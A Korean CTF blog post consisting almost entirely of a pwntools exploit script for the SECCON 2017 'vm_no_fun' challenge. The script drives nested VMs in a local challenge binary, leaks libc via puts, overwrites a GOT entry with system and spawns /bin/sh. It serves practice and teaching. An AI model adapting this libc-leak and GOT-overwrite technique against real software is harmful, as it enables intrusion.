SECCON 2017 vm_no_fun — Pwnable/CTF — 2018. 8. 15. 11:44
VM 공부할겸 풀어봄 ㅎ
# Exploit script for the SECCON 2017 "vm_no_fun" challenge binary (./inception).
# Python 2 code: `print` statements, str payloads, and `/` on ints meaning
# integer division are all relied on below.
# NOTE(review): this listing was recovered from a single collapsed line; the
# block nesting of the loops near the end was reconstructed and should be
# confirmed against the original post.
from pwn import *
from ctypes import *

p = process('./inception')
# The host libc is loaded through ctypes only to replay rand() locally; the
# seed must match the one the challenge uses, otherwise the byte search
# below finds the wrong indices.
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0x31337)

def parse_vm(op,arg0,arg1,arg2):
    """Pack one 8-byte instruction for the first VM.

    Layout produced: op, 0x02, 0x20, arg0, 0x00, 0x21, arg1, arg2.
    The 0x20/0x21 bytes are operand-type tags and arg0/arg1/arg2 are
    register indices (per the author's comments); their exact meaning
    is defined by the challenge binary, not by this script.
    """
    payload = p8(op)
    payload += '\x02'
    payload += p8(0x20) #type
    payload += p8(arg0) #regi_idx
    payload += '\x00'
    payload += p8(0x21) #type
    payload += p8(arg1) #regi_idx |
    payload += p8(arg2) #regi_idx >>
    return payload

def read_str(data):
    """Send `data` to the process as a 4-byte little-endian length prefix
    followed by the bytes themselves.

    The sleep between the two sends is a timing workaround so the target
    reads the length before the body arrives.
    """
    p.send(p32(len(data)))
    sleep(0.5)
    p.send(data)

def input_vm1(ins):
    """Select menu option 1, discard the prompt line, then send `ins`
    as a length-prefixed blob (the VM1 program)."""
    p.send('\x01')
    p.recvline()
    read_str(ins)

def vm1_setread():
    """Trailing VM1 instruction bytes the author uses for a 'read' setup."""
    return '\x0c\x00\xf4\x00'

def vm1_setwrite():
    """Trailing VM1 instruction bytes the author uses for a 'write' setup."""
    return '\x0b\x00\xf4\x00'

def parse_vm2(op,arg1,arg5,arg6,arg10):
    """Pack one 11-byte instruction for the second VM.

    `arg1` and `arg6` are each split into three little-endian bytes
    (low, mid, high) followed by a zero byte, so they are effectively
    24-bit operands; `arg5` and `arg10` are emitted as single bytes.
    Relies on Python 2 integer division for the `/` operations.
    """
    arg4 = p8(0)
    arg3 = p8(arg1 / 0x10000)
    arg2 = p8((arg1 % 0x10000)/0x100)
    arg1 = p8((arg1 % 0x100))
    arg9 = p8(0)
    arg8 = p8(arg6 / 0x10000)
    arg7 = p8((arg6 % 0x10000)/0x100)
    arg6 = p8((arg6 % 0x100))
    payload = p8(op) + arg1 + arg2 + arg3 + arg4 + p8(arg5)
    payload += arg6 + arg7 + arg8 + arg9 + p8(arg10)
    return payload

def input_vm2(payload):
    """Send `payload` length-prefixed, wait, then select menu option 2
    (run the second VM)."""
    read_str(payload)
    sleep(2)
    p.send('\x02')

def parse_vm3(op,arg0,arg1,arg3):
    """Pack one 6-byte instruction for the third VM.

    Only the high byte of `arg0` is emitted. `arg1` and `arg3` are each
    emitted as (value - (value >> 8), value >> 8); for every call site in
    this script the values are below 0x100, so the high byte is 0 and the
    low byte is the value itself. Whether that encoding is correct for
    larger values is not exercised here.
    """
    arg0 = (arg0 >> 8)
    payload = p8(op) + p8(arg0)
    arg2 = (arg1>>8)
    arg1 -= arg2
    payload += p8(arg1) + p8(arg2)
    arg4 = (arg3>>8)
    arg3 -= arg4
    payload += p8(arg3) + p8(arg4)
    return payload

# --- Stage 1: stage data and a VM2 program via VM1, then leak an address ---
print p.recvline()
set_ = parse_vm(0x89,0x7,0x0,0x6) #mov
input_vm1(set_+vm1_setread())
read_str('/bin/sh\x00'*0x10) #FUCK ..
set_ = parse_vm(0x89,0x7,0x0,0x6) #mov
set_ += parse_vm(0x89,0x0,0x10,0x0) #mov write_len_set
input_vm1(set_+vm1_setread())
sleep(1)
# Opcode/register meanings below are the author's annotations; the script
# itself only packs the bytes.
payload = parse_vm2(0xb4,0x1,0x20,0x900,0x21) #reg[1] = 0
payload += parse_vm2(0x28,0xa,0x20,0x700,0x21) #reg[0xa] = 0x700
payload += parse_vm2(0xb4,0x9,0x20,0x7000,0x21) #reg[9] = 0
payload += parse_vm2(0xb4,0x9,0x20,0x100e0,0x21) #reg[9] = -0x100e0 #puts@got idx
payload += parse_vm2(0x28,0xb,0x20,0x10,0x21) #unk_225138 cpy_len arg = 0x10
payload += parse_vm2(0x20,0x8,0x22,0x1,0x20) #pop
payload += parse_vm2(0x20,0xc,0x22,0x1,0x20) #pop
payload += parse_vm2(0x85,0x01,0x20,0x1,0x21) #cpy flag_set
payload += parse_vm2(0x83,0x01,0x20,0x1,0x21) #return 0
sleep(1)
input_vm2(payload)
set_ = parse_vm(0x1,0x7,0x0,0x2)
input_vm1(set_+vm1_setwrite())
p.recvuntil('A')
print p.recv(1024)
print p.recv(20).encode('hex')
# 8 leaked bytes are read as a little-endian pointer (puts). The three
# offsets below are specific to the libc build the challenge ran with and
# must be recomputed for any other libc.
puts = u64(p.recv(8))
libc_base = puts - 0x6f690
memcpy = libc_base + 0x14dea0
system = libc_base + 0x45390

# --- Stage 2: find rand() indices whose low byte equals each of the three
# low bytes of `system`, using the ctypes libc seeded above ---
count = [0]*3
target = [0]*3
target[0] = ((system&0xff))
target[1] = ((system&0xff00)>>8)
target[2] = ((system&0xff0000)>>16)
sort = []    # order in which the three target bytes were found
for i in range(0,0x10000):
    if(len(sort)<3):
        random = libc.rand()&0xff #byte
        # `count[k]<1` doubles as the "not found yet" flag; a match at i == 0
        # would leave count[k] == 0 and could be matched again later.
        if(target[0]==random and count[0]<1):
            count[0] = i
            print 'FIND {}'.format(target[0])
            sleep(3)
            sort.append(0)
        if(target[1]==random and count[1]<1):
            count[1] = i
            print 'FIND {}'.format(target[1])
            sleep(3)
            sort.append(1)
        if(target[2]==random and count[2]<1):
            count[2] = i
            print 'FIND {}'.format(target[2])
            sleep(3)
            sort.append(2)
    else:
        break
print hex(memcpy)
print hex(system)
print 'target > {}'.format(target)
print 'randCount > {}'.format(count)
print 'Sort > {}'.format(sort)
p.recv(1024)
# Debugging leftover: attaches gdb to the process and needs an interactive
# terminal; remove for unattended runs.
gdb.attach(p)

# --- Stage 3: two more VM2 programs, the second carrying a VM3 program ---
set_ = parse_vm(0x89,0x7,0,0x6)
input_vm1(set_+vm1_setread())
payload = parse_vm2(0x28,0x7,0x20,(0x700-0x30),0x21)
payload += parse_vm2(0xdb,0x1,0x20,0x1,0x21)
payload += parse_vm2(0x83,0x1,0x20,0x1,0x21)
payload += 'A'*15+'B'*0x2d0+'/bin/sh\x00'
input_vm2(payload)
set_ = parse_vm(0x89,0x7,0,0x6)
input_vm1(set_+vm1_setread())
payload = parse_vm2(0x28,0x7,0x20,0x5f0,0x21)
payload += parse_vm2(0xdb,0x01,0x20,0x1,0x21)
payload += parse_vm2(0x83,0x01,0x20,0x1,0x21)
payload += '\x83'*(0x100-len(payload))    # pad the VM2 part to exactly 0x100 bytes
vm3_p = parse_vm3(0x1,0x6500,0x3,0x0)
for i in range(3):
    # Number of rand() steps between consecutive found indices (first one
    # counted from the start), emitted as that many 0x15 instructions.
    if(i == 0):
        target = (count[sort[i]] + 0x1)
    else:
        target = (count[sort[i]] - count[sort[i-1]])
    vm3_p += parse_vm3(0x1,0x6500,0xb,0x0)
    vm3_p += parse_vm3(0x3,0x6500,0xb,(0x58-sort[i]))
    # Inner loop shadows the outer `i`; the outer `for` reassigns it, so
    # this is harmless but easy to misread.
    for i in range(target):
        vm3_p += parse_vm3(0x15,0x6500,0x1,0x1)
vm3_p += parse_vm3(0xc,0x6500,0x1,0x1) #call system('/bin/sh')
vm3_p += parse_vm3(0xb,0x6500,0x1,0x1) #return 0
payload += vm3_p
print len(payload)
input_vm2(payload)
p.recv(1024)
p.send('\x03')
###VM3 GOT -> SYSTEM ###
p.interactive()